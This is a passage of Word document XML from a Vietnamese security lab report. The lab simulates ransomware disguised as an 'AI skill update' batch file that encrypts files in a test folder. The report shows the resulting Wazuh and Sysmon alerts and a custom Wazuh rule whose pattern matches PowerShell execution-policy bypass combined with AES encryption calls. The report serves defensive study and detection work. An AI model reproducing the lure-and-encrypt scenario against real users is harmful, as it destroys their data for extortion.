          <w:right w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0C31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>endlocal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DBD14A" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc234664898"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5. Các bước thực hiện tấn công</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="68F8ADFE" w14:textId="5E10077D"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Sau khi file update-Skill-AI.bat được thực thi, chương trình mã hóa các tài liệu nằm trực tiếp trong thư mục:C:\Users\Admin\Downloads\Tailieunoibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2737C643" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">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Kết quả kiểm tra cho thấy nội dung của các tài liệu Word và file văn bản đã bị thay thế bằng chuỗi dữ liệu mã hóa. Các file vẫn giữ nguyên tên và phần mở rộng ban đầu nhưng không còn hiển thị được nội dung gốc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDD2C8" w14:textId="167F67D3" w:rsidR="000D3737" w:rsidRDefault="000D0C31">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0C31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30BEC752" wp14:editId="7496D3E7">
            <wp:extent cx="5733415" cy="3525520"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="154072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28382" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3525520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE1C44D" w14:textId="594C456B" w:rsidR="000D3737" w:rsidRDefault="00000000" w:rsidP="000D0C31">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khi thực thi file BAT, nội dung các tài liệu trong thư mục Tailieunoibo đã bị mã hóa và không còn đọc được bình thường. Nhiều file có cùng thời gian chỉnh sửa, đồng thời xuất hiện thêm </w:t>
      </w:r>
      <w:r w:rsidR="000D0C31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ransom</w:t>
      </w:r>
      <w:r w:rsidR="000D0C31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>_note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và thekey.key, cho thấy quá trình mã hóa hàng loạt đã </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334C585" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_heading=h.2wcsv1cqs52i" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="25" w:name="_Toc234664899"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6. Kiểm tra trên SIEM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="31F84CA4" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00000000" w:rsidP="00443EB6">
      <w:pPr>
        <w:spacing w:after="200"/>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xml:space="preserve">Sau khi chương trình mô phỏng được thực thi, Wazuh File Integrity Monitoring ghi nhận nhiều sự kiện thay đổi dữ liệu phát sinh từ máy Windows </w:t>
      </w:r>
      <w:r w:rsidR="00443EB6" w:rsidRPr="00443EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>agent.name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A496B" w14:textId="093BF7B8" w:rsidR="000D3737" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00443EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DESKTOP-1HJ4R28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562F805C" w14:textId="52DDDE2E" w:rsidR="000D3737" w:rsidRDefault="00443EB6">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00443EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24A1641A" wp14:editId="3F13C5D8">
            <wp:extent cx="5733415" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="20665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9056" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="723900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D917EB6" w14:textId="544C7361" w:rsidR="00443EB6" w:rsidRDefault="00443EB6">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00443EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh đã ghi nhận thành công hành vi thực thi đáng ngờ trên máy DESKTOP-1HJ4R28 thông qua Sysmon Event ID 1. Tiến trình cmd.exe thực thi tệp update-Skill-Ai.bat, sau đó khởi chạy powershell.exe với tham số -ExecutionPolicy Bypass. Nội dung command line chứa các API mã hóa như System.Security.Cryptography.Aes, RNGCryptoServiceProvider và TransformFinalBlock, đồng thời thực hiện ghi đè dữ liệu, đổi tên tệp sang phần mở rộng .encrypted, tạo khóa thekey.key và thông báo đòi tiền chuộc README_RANSOM.txt. Wazuh đã sinh cảnh báo rule 92029, mức độ 6 và ánh xạ kỹ thuật MITRE ATT&amp;CK T1059.001 – PowerShell. Các dấu hiệu trên cho thấy chuỗi thực thi phù hợp với hành vi mô phỏng ransomware. Để củng cố kết luận, </w:t>
      </w:r>
      <w:r w:rsidRPr="00443EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cần đối chiếu thêm Sysmon Event ID 11 hoặc Wazuh FIM nhằm xác nhận nhiều tệp .encrypted được tạo trong thời gian ngắn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775C383D" w14:textId="3D292C6C" w:rsidR="000D3737" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00443EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="597830BB" wp14:editId="31C712CE">
            <wp:extent cx="5733415" cy="2773045"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="185690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00003" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2773045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818D114" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_heading=h.og9bus759adq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="27" w:name="_Toc234664900"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7. Xây dựng custom rule trên Wazuh</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="3B19A177"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Rule được xây dựng nhằm phát hiện trường hợp một trình thông dịch lệnh hoặc công cụ thực thi script như cmd.exe, PowerShell, WScript hoặc CScript khởi chạy tiến trình Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61542AB8"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4F7C289"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kịch bản thử nghiệm, người dùng thực thi tệp giả mạo cập nhật kỹ năng AI. Tệp này gọi cmd.exe, sau đó khởi chạy Python để thực thi mã nguồn bên trong. Vì vậy, chuỗi tiến trình cần giám sát là: cmd.exe hoặc trình thực thi script python.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEEFEF9"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Wazuh Dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB88460"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Đi theo đường dẫn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BB429F"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1B07411" wp14:editId="79618358">
            <wp:extent cx="4953000" cy="6343650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="115" name="image70.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="115" name="image70.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4953000" cy="6343650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F7AF65" w14:textId="1586ACA9" w:rsidR="000D3737" w:rsidRDefault="00D214E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D214E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A9A924E" wp14:editId="5B5EB82E">
            <wp:extent cx="5733415" cy="1974850"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="73223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35364" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="1974850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A10832B" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style6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29"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D3737" w14:paraId="0658FFB0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9029" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6A3C2647" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;group name="windows,sysmon,ransomware_lab,"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20954F75" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B15F0EE" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;rule id="110380" level="12"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33C8A17E" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;if_sid&gt;92029&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32E8401B" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12F023C7" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;field name="win.eventdata.commandLine"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21994636" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">           type="pcre2"&gt;(?i)(ExecutionPolicy\s+Bypass).*(TransformFinalBlock|Cryptography\.Aes|RNGCryptoServiceProvider)&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="102752F2" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4FA5D2C6" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2793CD00" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">      [LAB] PowerShell ransomware-like AES encryption detected</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C2C2F05" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7614D198" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17B99AF3" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="467A10F4" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">      &lt;id&gt;T1059.001&lt;/id&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53E92EB7" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
